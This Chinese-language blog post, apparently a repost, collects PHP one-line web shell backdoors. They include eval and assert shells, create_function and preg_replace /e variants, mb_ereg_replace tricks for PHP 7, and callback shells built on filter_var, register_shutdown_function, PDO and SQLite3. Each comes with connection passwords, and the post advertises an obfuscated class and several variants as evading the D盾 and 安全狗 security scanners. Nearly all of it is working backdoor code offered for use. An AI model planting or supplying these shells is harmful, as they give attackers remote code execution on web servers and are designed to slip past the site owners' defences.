php一句話后門

開發很久的可利用函數

eval和assert

php任意代碼執行的一句話后門，我們喜歡用的是傳統的eval，php5，7通用。

<?php @eval($_POST['a']) ?>

但由于eval不能拆分，早期也有人喜歡用assert，這樣通過編碼和拆分assert，隱蔽性更高

<?php @assert($_POST['a']) ?>

雖然有人說assert在php7.0及其以上版本被禁用，但實際上并沒有禁用，而是和eval一樣禁止拆分了。

絕大部分一句話后門，都跟這兩個函數（其實不是函數）有關

create_function和preg_replace函數

create_function，它的作用是創建一個匿名函數，在內部也相當于執行了一次eval。php5，7都可用

<?php $st=@create_function('',$_POST['a']);$st();?>

/e修飾符，也就是大家熟知的preg_replace。這個則是真的php7用不了了，僅限php5。

<?php @preg_replace('/.*/e',$_POST['a'],'');?>

除了preg_replace之外，還有一個和它類似的函數。

<?php @preg_filter('/.*/e',$_POST['a'],'');?>

這兩個都是僅限php5的，php7也想用這種方法怎么辦呢？有辦法，php并沒有完全將/e修飾符趕盡殺絕。

<?php @mb_ereg_replace('.*',$_POST['a'],'','ee');?> <?php @mb_eregi_replace('.*',$_POST['a'],'','ee');?>

它們甚至還有別名

<?php @mbereg_replace('.*',$_POST['a'],'','ee');?> <?php @mberegi_replace('.*',$_POST['a'],'','ee');?>

繞D盾方法

上面這些都開發出來很久了，單純拿這些去繞D盾是很難的，這里也不是來教大家繞D盾的。想繞的話，其實D盾對類的檢測力度不高，自己寫個混淆一點的類，php5用assert拆分，php7用create_function拆分其實就很容易繞過去。舉個例子

//該例子為create_function拆分，php5.3.29和5.2.17測試完不可行，php5.4.45-php7都可行。故php5用assert拆分，php7用create_function拆分這樣最穩 <?php class create{ public $filter = ['q'=>'_function']; public $value = ''; public function __construct(){ $this->value = $_POST['a']; $name=get_class($this).$this->filter['q']; $st=$name('',$this->value); $st(); } } $a = new create();

免殺一句話木馬之回調函數

回調函數的本質是下面這種代碼，以函數作為變量。

<?php $_GET['a']($_GET['b']);?>

比較老的回調后門

URL地址：http://127.0.0.1/1.php 連接密碼：pass

php中call_user_func是執行回調函數的標準方法，這是比較老的后門了：

<?php call_user_func('assert', $_REQUEST['pass']); <?php call_user_func_array('assert', array($_REQUEST['pass']));

真免殺回調后門(過安全狗,D盾)

URL地址：http://127.0.0.1/1.php?e=assert 連接密碼：pass

<?php filter_var($_REQUEST['pass'], FILTER_CALLBACK, array('options' => 'assert')); <?php filter_var_array(array('test' => $_REQUEST['pass']), array('test' => array('filter' => FILTER_CALLBACK, 'options' => 'assert'))); <?php $e = $_REQUEST['e']; register_shutdown_function($e, $_REQUEST['pass']); <?php mb_ereg_replace('.*', $_REQUEST['pass'], '', 'e');

下面這兩個回調后門，都是依靠php擴展庫（pdo和sqlite3）來實現的：

<?php $e = $_REQUEST['e']; $db = new PDO('sqlite:sqlite.db3'); $db->sqliteCreateFunction('myfunc', $e, 1); $sth = $db->prepare("SELECT myfunc(:exec)"); $sth->execute(array(':exec' => $_REQUEST['pass']));

上面這種sqlite方法是依靠PDO執行的。我們也可以直接調用sqlite3的方法構造回調后門，前提是php5.3以上。

<?php $e = $_REQUEST['e']; $db = new SQLite3('sqlite.db3'); $db->createFunction('myfunc', $e); $stmt = $db->prepare("SELECT myfunc(?)"); $stmt->bindValue(1, $_REQUEST['pass'], SQLITE3_TEXT); $stmt->execute();

總結

以上是生活随笔為你收集整理的php一句话后门学习（含免杀）的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。